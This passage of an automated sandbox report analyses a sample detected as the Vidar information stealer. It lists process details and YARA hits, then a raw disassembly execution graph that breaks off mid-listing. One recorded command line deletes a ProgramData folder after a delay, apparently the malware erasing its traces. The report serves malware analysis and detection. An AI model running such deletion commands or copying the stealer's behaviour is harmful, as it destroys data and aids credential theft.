                                                                                                  Start time:13:57:58
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:Buyer.pif p
                                                                                                  Imagebase:0xf40000
                                                                                                  File size:946'784 bytes
                                                                                                  MD5 hash:848164D084384C49937F99D5B894253E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:13:57:58
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:choice /d y /t 5
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:28'160 bytes
                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:13:58:49
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDHJKKJDH" & exit
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:13:58:49
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:13:58:49
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:timeout /t 10
                                                                                                  Imagebase:0x770000
                                                                                                  File size:25'088 bytes
                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:13.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:20.6%
                                                                                                    Total number of Nodes:1523
                                                                                                    Total number of Limit Nodes:39
                                                                                                    execution_graph 4187 402fc0 4188 401446 18 API calls 4187->4188 4189 402fc7 4188->4189 4190 403017 4189->4190 4191 40300a 4189->4191 4194 401a13 4189->4194 4192 406805 18 API calls 4190->4192 4193 401446 18 API calls 4191->4193 4192->4194 4193->4194 4195 4023c1 4196 40145c 18 API calls 4195->4196 4197 4023c8 4196->4197 4200 40726a 4197->4200 4203 406ed2 CreateFileW 4200->4203 4204 406f04 4203->4204 4205 406f1e ReadFile 4203->4205 4206 4062a3 11 API calls 4204->4206 4207 4023d6 4205->4207 4210 406f84 4205->4210 4206->4207 4208 4071e3 CloseHandle 4208->4207 4209 406f9b ReadFile lstrcpynA lstrcmpA 4209->4210 4211 406fe2 SetFilePointer ReadFile 4209->4211 4210->4207 4210->4208 4210->4209 4214 406fdd 4210->4214 4211->4208 4212 4070a8 ReadFile 4211->4212 4213 407138 4212->4213 4213->4212 4213->4214 4215 40715f SetFilePointer GlobalAlloc ReadFile 4213->4215 4214->4208 4216 4071a3 4215->4216 4217 4071bf lstrcpynW GlobalFree 4215->4217 4216->4216 4216->4217 4217->4208 4218 401cc3 4219 40145c 18 API calls 4218->4219 4220 401cca lstrlenW 4219->4220 4221 4030dc 4220->4221 4222 4030e3 4221->4222 4224 405f51 wsprintfW 4221->4224 4224->4222 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062a3 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406c9b 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4250 403050 4247->4250 4248 406805 18 API calls 4249 401a13 4248->4249 4250->4248 4250->4249 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4048cc 4261 4048f1 4260->4261 4262 4048da 4260->4262 4264 4048ff IsWindowVisible 4261->4264 4268 404916 4261->4268 4263 4048e0 4262->4263 4278 40495a 4262->4278 4265 403daf SendMessageW 4263->4265 4267 40490c 4264->4267 4264->4278 4269 4048ea 4265->4269 4266 404960 CallWindowProcW 4266->4269 4279 40484e SendMessageW 4267->4279 4268->4266 4284 406009 lstrcpynW 4268->4284 4272 404945 4285 405f51 wsprintfW 4272->4285 4274 40494c 4275 40141d 80 API calls 4274->4275 4276 404953 4275->4276 4286 406009 lstrcpynW 4276->4286 4278->4266 4280 404871 GetMessagePos ScreenToClient SendMessageW 4279->4280 4281 4048ab SendMessageW 4279->4281 4282 4048a3 4280->4282 4283 4048a8 4280->4283 4281->4282 4282->4268 4283->4281 4284->4272 4285->4274 4286->4278 4287 4022cc 4288 40145c 18 API calls 4287->4288 4289 4022d3 4288->4289 4290 4062d5 2 API calls 4289->4290 4291 4022d9 4290->4291 4292 4022e8 4291->4292 4296 405f51 wsprintfW 4291->4296 4295 4030e3 4292->4295 4297 405f51 wsprintfW 4292->4297 4296->4292 4297->4295 4298 4050cd 4299 405295 4298->4299 4300 4050ee GetDlgItem GetDlgItem GetDlgItem 4298->4300 4301 4052c6 4299->4301 4302 40529e GetDlgItem CreateThread CloseHandle 4299->4302 4347 403d98 SendMessageW 4300->4347 4304 4052f4 4301->4304 4306 4052e0 ShowWindow ShowWindow 4301->4306 4307 405316 4301->4307 4302->4301 4308 405352 4304->4308 4310 405305 4304->4310 4311 40532b ShowWindow 4304->4311 4305 405162 4318 406805 18 API calls 4305->4318 4352 403d98 SendMessageW 4306->4352 4356 403dca 4307->4356 4308->4307 4313 40535d SendMessageW 4308->4313 4353 403d18 4310->4353 4316 40534b 4311->4316 4317 40533d 4311->4317 4315 40528e 4313->4315 4320 405376 CreatePopupMenu 4313->4320 4319 403d18 SendMessageW 4316->4319 4321 404f72 25 API calls 4317->4321 4322 405181 4318->4322 4319->4308 4323 406805 18 API calls 4320->4323 4321->4316 4324 4062a3 11 API calls 4322->4324 4326 405386 AppendMenuW 4323->4326 4325 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4324->4325 4327 4051f3 4325->4327 4328 4051d7 SendMessageW SendMessageW 4325->4328 4329 405399 GetWindowRect 4326->4329 4330 4053ac 4326->4330 4331 405206 4327->4331 4332 4051f8 SendMessageW 4327->4332 4328->4327 4333 4053b3 TrackPopupMenu 4329->4333 4330->4333 4348 403d3f 4331->4348 4332->4331 4333->4315 4335 4053d1 4333->4335 4337 4053ed SendMessageW 4335->4337 4336 405216 4338 405253 GetDlgItem SendMessageW 4336->4338 4339 40521f ShowWindow 4336->4339 4337->4337 4340 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4337->4340 4338->4315 4343 405276 SendMessageW SendMessageW 4338->4343 4341 405242 4339->4341 4342 405235 ShowWindow 4339->4342 4344 40542f SendMessageW 4340->4344 4351 403d98 SendMessageW 4341->4351 4342->4341 4343->4315 4344->4344 4345 40545a GlobalUnlock SetClipboardData CloseClipboard 4344->4345 4345->4315 4347->4305 4349 406805 18 API calls 4348->4349 4350 403d4a SetDlgItemTextW 4349->4350 4350->4336 4351->4338 4352->4304 4354 403d25 SendMessageW 4353->4354 4355 403d1f 4353->4355 4354->4307 4355->4354 4357 403ddf GetWindowLongW 4356->4357 4367 403e68 4356->4367 4358 403df0 4357->4358 4357->4367 4359 403e02 4358->4359 4360 403dff GetSysColor 4358->4360 4361 403e12 SetBkMode 4359->4361 4362 403e08 SetTextColor 4359->4362 4360->4359 4363 403e30 4361->4363 4364 403e2a GetSysColor 4361->4364 4362->4361 4365 403e41 4363->4365 4366 403e37 SetBkColor 4363->4366 4364->4363 4365->4367 4368 403e54 DeleteObject 4365->4368 4369 403e5b CreateBrushIndirect 4365->4369 4366->4365 4367->4315 4368->4369 4369->4367 4370 4030cf 4371 40145c 18 API calls 4370->4371 4372 4030d6 4371->4372 4374 4030dc 4372->4374 4377 4063ac GlobalAlloc lstrlenW 4372->4377 4375 4030e3 4374->4375 4404 405f51 wsprintfW 4374->4404 4378 4063e2 4377->4378 4379 406434 4377->4379 4380 40640f GetVersionExW 4378->4380 4405 40602b CharUpperW 4378->4405 4379->4374 4380->4379 4381 40643e 4380->4381 4382 406464 LoadLibraryA 4381->4382 4383 40644d 4381->4383 4382->4379 4386 406482 GetProcAddress GetProcAddress GetProcAddress 4382->4386 4383->4379 4385 406585 GlobalFree 4383->4385 4387 40659b LoadLibraryA 4385->4387 4388 4066dd FreeLibrary 4385->4388 4391 4064aa 4386->4391 4394 4065f5 4386->4394 4387->4379 4390 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4387->4390 4388->4379 4389 406651 FreeLibrary 4398 40662a 4389->4398 4390->4394 4392 4064ce FreeLibrary GlobalFree 4391->4392 4391->4394 4400 4064ea 4391->4400 4392->4379 4393 4066ea 4396 4066ef CloseHandle FreeLibrary 4393->4396 4394->4389 4394->4398 4395 4064fc lstrcpyW OpenProcess 4397 40654f CloseHandle CharUpperW lstrcmpW 4395->4397 4395->4400 4399 406704 CloseHandle 4396->4399 4397->4394 4397->4400 4398->4393 4401 406685 lstrcmpW 4398->4401 4402 4066b6 CloseHandle 4398->4402 4403 4066d4 CloseHandle 4398->4403 4399->4396 4400->4385 4400->4395 4400->4397 4401->4398 4401->4399 4402->4398 4403->4388 4404->4375 4405->4378 4406 407752 4410 407344 4406->4410 4407 407c6d 4408 4073c2 GlobalFree 4409 4073cb GlobalAlloc 4408->4409 4409->4407 4409->4410 4410->4407 4410->4408 4410->4409 4410->4410 4411 407443 GlobalAlloc 4410->4411 4412 40743a GlobalFree 4410->4412 4411->4407 4411->4410 4412->4411 4413 401dd3 4414 401446 18 API calls 4413->4414 4415 401dda 4414->4415 4416 401446 18 API calls 4415->4416 4417 4018d3 4416->4417 4425 402e55 4426 40145c 18 API calls 4425->4426 4427 402e63 4426->4427 4428 402e79 4427->4428 4429 40145c 18 API calls 4427->4429 4430 405e30 2 API calls 4428->4430 4429->4428 4431 402e7f 4430->4431 4455 405e50 GetFileAttributesW CreateFileW 4431->4455 4433 402e8c 4434 402f35 4433->4434 4435 402e98 GlobalAlloc 4433->4435 4438 4062a3 11 API calls 4434->4438 4436 402eb1 4435->4436 4437 402f2c CloseHandle 4435->4437 4456 403368 SetFilePointer 4436->4456 4437->4434 4440 402f45 4438->4440 4442 402f50 DeleteFileW 4440->4442 4443 402f63 4440->4443 4441 402eb7 4445 403336 ReadFile 4441->4445 4442->4443 4457 401435 4443->4457 4446 402ec0 GlobalAlloc 4445->4446 4447 402ed0 4446->4447 4448 402f04 WriteFile GlobalFree 4446->4448 4449 40337f 37 API calls 4447->4449 4450 40337f 37 API calls 4448->4450 4454 402edd 4449->4454 4451 402f29 4450->4451 4451->4437 4453 402efb GlobalFree 4453->4448 4454->4453 4455->4433 4456->4441 4458 404f72 25 API calls 4457->4458 4459 401443 4458->4459 4460 401cd5 4461 401446 18 API calls 4460->4461 4462 401cdd 4461->4462 4463 401446 18 API calls 4462->4463 4464 401ce8 4463->4464 4465 40145c 18 API calls 4464->4465 4466 401cf1 4465->4466 4467 401d07 lstrlenW 4466->4467 4468 401d43 4466->4468 4469 401d11 4467->4469 4469->4468 4473 406009 lstrcpynW 4469->4473 4471 401d2c 4471->4468 4472 401d39 lstrlenW 4471->4472 4472->4468 4473->4471 4474 403cd6 4475 403ce1 4474->4475 4476 403ce5 4475->4476 4477 403ce8 GlobalAlloc 4475->4477 4477->4476 4478 402cd7 4479 401446 18 API calls 4478->4479 4482 402c64 4479->4482 4480 402d99 4481 402d17 ReadFile 4481->4482 4482->4478 4482->4480 4482->4481 4483 402dd8 4484 402ddf 4483->4484 4485 4030e3 4483->4485 4486 402de5 FindClose 4484->4486 4486->4485 4487 401d5c 4488 40145c 18 API calls 4487->4488 4489 401d63 4488->4489 4490 40145c 18 API calls 4489->4490 4491 401d6c 4490->4491 4492 401d73 lstrcmpiW 4491->4492 4493 401d86 lstrcmpW 4491->4493 4494 401d79 4492->4494 4493->4494 4495 401c99 4493->4495 4494->4493 4494->4495 4125 407c5f 4126 407344 4125->4126 4127 4073c2 GlobalFree 4126->4127 4128 4073cb GlobalAlloc 4126->4128 4129 407c6d 4126->4129 4130 407443 GlobalAlloc 4126->4130 4131 40743a GlobalFree 4126->4131 4127->4128 4128->4126 4128->4129 4130->4126 4130->4129 4131->4130 4496 404363 4497 404373 4496->4497 4498 40439c 4496->4498 4500 403d3f 19 API calls 4497->4500 4499 403dca 8 API calls 4498->4499 4501 4043a8 4499->4501 4502 404380 SetDlgItemTextW 4500->4502 4502->4498 4503 4027e3 4504 4027e9 4503->4504 4505 4027f2 4504->4505 4506 402836 4504->4506 4519 401553 4505->4519 4507 40145c 18 API calls 4506->4507 4509 40283d 4507->4509 4511 4062a3 11 API calls 4509->4511 4510 4027f9 4512 40145c 18 API calls 4510->4512 4517 401a13 4510->4517 4513 40284d 4511->4513 4514 40280a RegDeleteValueW 4512->4514 4523 40149d RegOpenKeyExW 4513->4523 4515 4062a3 11 API calls 4514->4515 4518 40282a RegCloseKey 4515->4518 4518->4517 4520 401563 4519->4520 4521 40145c 18 API calls 4520->4521 4522 401589 RegOpenKeyExW 4521->4522 4522->4510 4529 401515 4523->4529 4531 4014c9 4523->4531 4524 4014ef RegEnumKeyW 4525 401501 RegCloseKey 4524->4525 4524->4531 4526 4062fc 3 API calls 4525->4526 4528 401511 4526->4528 4527 401526 RegCloseKey 4527->4529 4528->4529 4532 401541 RegDeleteKeyW 4528->4532 4529->4517 4530 40149d 3 API calls 4530->4531 4531->4524 4531->4525 4531->4527 4531->4530 4532->4529 4533 403f64 4534 403f90 4533->4534 4535 403f74 4533->4535 4537 403fc3 4534->4537 4538 403f96 SHGetPathFromIDListW 4534->4538 4544 405c84 GetDlgItemTextW 4535->4544 4540 403fad SendMessageW 4538->4540 4541 403fa6 4538->4541 4539 403f81 SendMessageW 4539->4534 4540->4537 4542 40141d 80 API calls 4541->4542 4542->4540 4544->4539 4545 402ae4 4546 402aeb 4545->4546 4547 4030e3 4545->4547 4548 402af2 CloseHandle 4546->4548 4548->4547 4549 402065 4550 401446 18 API calls 4549->4550 4551 40206d 4550->4551 4552 401446 18 API calls 4551->4552 4553 402076 GetDlgItem 4552->4553 4554 4030dc 4553->4554 4555 4030e3 4554->4555 4557 405f51 wsprintfW 4554->4557 4557->4555 4558 402665 4559 40145c 18 API calls 4558->4559 4560 40266b 4559->4560 4561 40145c 18 API calls 4560->4561 4562 402674 4561->4562 4563 40145c 18 API calls 4562->4563 4564 40267d 4563->4564 4565 4062a3 11 API calls 4564->4565 4566 40268c 4565->4566 4567 4062d5 2 API calls 4566->4567 4568 402695 4567->4568 4569 4026a6 lstrlenW lstrlenW 4568->4569 4570 404f72 25 API calls 4568->4570 4573 4030e3 4568->4573 4571 404f72 25 API calls 4569->4571 4570->4568 4572 4026e8 SHFileOperationW 4571->4572 4572->4568 4572->4573 4581 401c69 4582 40145c 18 API calls 4581->4582 4583 401c70 4582->4583 4584 4062a3 11 API calls 4583->4584 4585 401c80 4584->4585 4586 405ca0 MessageBoxIndirectW 4585->4586 4587 401a13 4586->4587 4595 402f6e 4596 402f72 4595->4596 4597 402fae 4595->4597 4598 4062a3 11 API calls 4596->4598 4599 40145c 18 API calls 4597->4599 4600 402f7d 4598->4600 4605 402f9d 4599->4605 4601 4062a3 11 API calls 4600->4601 4602 402f90 4601->4602 4603 402fa2 4602->4603 4604 402f98 4602->4604 4607 4060e7 9 API calls 4603->4607 4606 403e74 5 API calls 4604->4606 4606->4605 4607->4605 4608 4023f0 4609 402403 4608->4609 4610 4024da 4608->4610 4611 40145c 18 API calls 4609->4611 4612 404f72 25 API calls 4610->4612 4613 40240a 4611->4613 4618 4024f1 4612->4618 4614 40145c 18 API calls 4613->4614 4615 402413 4614->4615 4616 402429 LoadLibraryExW 4615->4616 4617 40241b GetModuleHandleW 4615->4617 4619 40243e 4616->4619 4620 4024ce 4616->4620 4617->4616 4617->4619 4632 406365 GlobalAlloc WideCharToMultiByte 4619->4632 4621 404f72 25 API calls 4620->4621 4621->4610 4623 402449 4624 40248c 4623->4624 4625 40244f 4623->4625 4626 404f72 25 API calls 4624->4626 4628 401435 25 API calls 4625->4628 4630 40245f 4625->4630 4627 402496 4626->4627 4629 4062a3 11 API calls 4627->4629 4628->4630 4629->4630 4630->4618 4631 4024c0 FreeLibrary 4630->4631 4631->4618 4633 406390 GetProcAddress 4632->4633 4634 40639d GlobalFree 4632->4634 4633->4634 4634->4623 4635 402df3 4636 402dfa 4635->4636 4638 4019ec 4635->4638 4637 402e07 FindNextFileW 4636->4637 4637->4638 4639 402e16 4637->4639 4641 406009 lstrcpynW 4639->4641 4641->4638 4642 402175 4643 401446 18 API calls 4642->4643 4644 40217c 4643->4644 4645 401446 18 API calls 4644->4645 4646 402186 4645->4646 4647 4062a3 11 API calls 4646->4647 4651 402197 4646->4651 4647->4651 4648 4021aa EnableWindow 4650 4030e3 4648->4650 4649 40219f ShowWindow 4649->4650 4651->4648 4651->4649 4659 404077 4660 404081 4659->4660 4661 404084 lstrcpynW lstrlenW 4659->4661 4660->4661 4662 405479 4663 405491 4662->4663 4664 4055cd 4662->4664 4663->4664 4665 40549d 4663->4665 4666 40561e 4664->4666 4667 4055de GetDlgItem GetDlgItem 4664->4667 4668 4054a8 SetWindowPos 4665->4668 4669 4054bb 4665->4669 4671 405678 4666->4671 4679 40139d 80 API calls 4666->4679 4670 403d3f 19 API calls 4667->4670 4668->4669 4673 4054c0 ShowWindow 4669->4673 4674 4054d8 4669->4674 4675 405608 SetClassLongW 4670->4675 4672 403daf SendMessageW 4671->4672 4692 4055c8 4671->4692 4701 40568a 4672->4701 4673->4674 4676 4054e0 DestroyWindow 4674->4676 4677 4054fa 4674->4677 4678 40141d 80 API calls 4675->4678 4729 4058dc 4676->4729 4680 405510 4677->4680 4681 4054ff SetWindowLongW 4677->4681 4678->4666 4682 405650 4679->4682 4685 405587 4680->4685 4686 40551c GetDlgItem 4680->4686 4681->4692 4682->4671 4687 405654 SendMessageW 4682->4687 4683 40141d 80 API calls 4683->4701 4684 4058de DestroyWindow EndDialog 4684->4729 4688 403dca 8 API calls 4685->4688 4690 40554c 4686->4690 4691 40552f SendMessageW IsWindowEnabled 4686->4691 4687->4692 4688->4692 4689 40590d ShowWindow 4689->4692 4694 405559 4690->4694 4695 4055a0 SendMessageW 4690->4695 4696 40556c 4690->4696 4704 405551 4690->4704 4691->4690 4691->4692 4693 406805 18 API calls 4693->4701 4694->4695 4694->4704 4695->4685 4699 405574 4696->4699 4700 405589 4696->4700 4697 403d18 SendMessageW 4697->4685 4698 403d3f 19 API calls 4698->4701 4702 40141d 80 API calls 4699->4702 4703 40141d 80 API calls 4700->4703 4701->4683 4701->4684 4701->4692 4701->4693 4701->4698 4705 403d3f 19 API calls 4701->4705 4720 40581e DestroyWindow 4701->4720 4702->4704 4703->4704 4704->4685 4704->4697 4706 405705 GetDlgItem 4705->4706 4707 405723 ShowWindow EnableWindow 4706->4707 4708 40571a 4706->4708 4730 403d85 EnableWindow 4707->4730 4708->4707 4710 40574d EnableWindow 4713 405761 4710->4713 4711 405766 GetSystemMenu EnableMenuItem SendMessageW 4712 405796 SendMessageW 4711->4712 4711->4713 4712->4713 4713->4711 4731 403d98 SendMessageW 4713->4731 4732 406009 lstrcpynW 4713->4732 4716 4057c4 lstrlenW 4717 406805 18 API calls 4716->4717 4718 4057da SetWindowTextW 4717->4718 4719 40139d 80 API calls 4718->4719 4719->4701 4721 405838 CreateDialogParamW 4720->4721 4720->4729 4722 40586b 4721->4722 4721->4729 4723 403d3f 19 API calls 4722->4723 4724 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4723->4724 4725 40139d 80 API calls 4724->4725 4726 4058bc 4725->4726 4726->4692 4727 4058c4 ShowWindow 4726->4727 4728 403daf SendMessageW 4727->4728 4728->4729 4729->4689 4729->4692 4730->4710 4731->4713 4732->4716 4733 4020f9 GetDC GetDeviceCaps 4734 401446 18 API calls 4733->4734 4735 402116 MulDiv 4734->4735 4736 401446 18 API calls 4735->4736 4737 40212c 4736->4737 4738 406805 18 API calls 4737->4738 4739 402165 CreateFontIndirectW 4738->4739 4740 4030dc 4739->4740 4741 4030e3 4740->4741 4743 405f51 wsprintfW 4740->4743 4743->4741 4744 4024fb 4745 40145c 18 API calls 4744->4745 4746 402502 4745->4746 4747 40145c 18 API calls 4746->4747 4748 40250c 4747->4748 4749 40145c 18 API calls 4748->4749 4750 402515 4749->4750 4751 40145c 18 API calls 4750->4751 4752 40251f 4751->4752 4753 40145c 18 API calls 4752->4753 4754 402529 4753->4754 4755 40253d 4754->4755 4756 40145c 18 API calls 4754->4756 4757 4062a3 11 API calls 4755->4757 4756->4755 4758 40256a CoCreateInstance 4757->4758 4759 40258c 4758->4759 4760 40497c GetDlgItem GetDlgItem 4761 4049d2 7 API calls 4760->4761 4766 404bea 4760->4766 4762 404a76 DeleteObject 4761->4762 4763 404a6a SendMessageW 4761->4763 4764 404a81 4762->4764 4763->4762 4767 404ab8 4764->4767 4769 406805 18 API calls 4764->4769 4765 404ccf 4768 404d74 4765->4768 4773 404bdd 4765->4773 4778 404d1e SendMessageW 4765->4778 4766->4765 4776 40484e 5 API calls 4766->4776 4789 404c5a 4766->4789 4772 403d3f 19 API calls 4767->4772 4770 404d89 4768->4770 4771 404d7d SendMessageW 4768->4771 4775 404a9a SendMessageW SendMessageW 4769->4775 4780 404da2 4770->4780 4781 404d9b ImageList_Destroy 4770->4781 4791 404db2 4770->4791 4771->4770 4777 404acc 4772->4777 4779 403dca 8 API calls 4773->4779 4774 404cc1 SendMessageW 4774->4765 4775->4764 4776->4789 4782 403d3f 19 API calls 4777->4782 4778->4773 4784 404d33 SendMessageW 4778->4784 4785 404f6b 4779->4785 4786 404dab GlobalFree 4780->4786 4780->4791 4781->4780 4787 404add 4782->4787 4783 404f1c 4783->4773 4792 404f31 ShowWindow GetDlgItem ShowWindow 4783->4792 4788 404d46 4784->4788 4786->4791 4790 404baa GetWindowLongW SetWindowLongW 4787->4790 4799 404ba4 4787->4799 4802 404b39 SendMessageW 4787->4802 4803 404b67 SendMessageW 4787->4803 4804 404b7b SendMessageW 4787->4804 4798 404d57 SendMessageW 4788->4798 4789->4765 4789->4774 4793 404bc4 4790->4793 4791->4783 4794 404de4 4791->4794 4797 40141d 80 API calls 4791->4797 4792->4773 4795 404be2 4793->4795 4796 404bca ShowWindow 4793->4796 4807 404e12 SendMessageW 4794->4807 4810 404e28 4794->4810 4812 403d98 SendMessageW 4795->4812 4811 403d98 SendMessageW 4796->4811 4797->4794 4798->4768 4799->4790 4799->4793 4802->4787 4803->4787 4804->4787 4805 404ef3 InvalidateRect 4805->4783 4806 404f09 4805->4806 4813 4043ad 4806->4813 4807->4810 4809 404ea1 SendMessageW SendMessageW 4809->4810 4810->4805 4810->4809 4811->4773 4812->4766 4814 4043cd 4813->4814 4815 406805 18 API calls 4814->4815 4816 40440d 4815->4816 4817 406805 18 API calls 4816->4817 4818 404418 4817->4818 4819 406805 18 API calls 4818->4819 4820 404428 lstrlenW wsprintfW SetDlgItemTextW 4819->4820 4820->4783 4821 4026fc 4822 401ee4 4821->4822 4824 402708 4821->4824 4822->4821 4823 406805 18 API calls 4822->4823 4823->4822 4120 4019fd 4121 40145c 18 API calls 4120->4121 4122 401a04 4121->4122 4123 405e7f 2 API calls 4122->4123 4124 401a0b 4123->4124 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 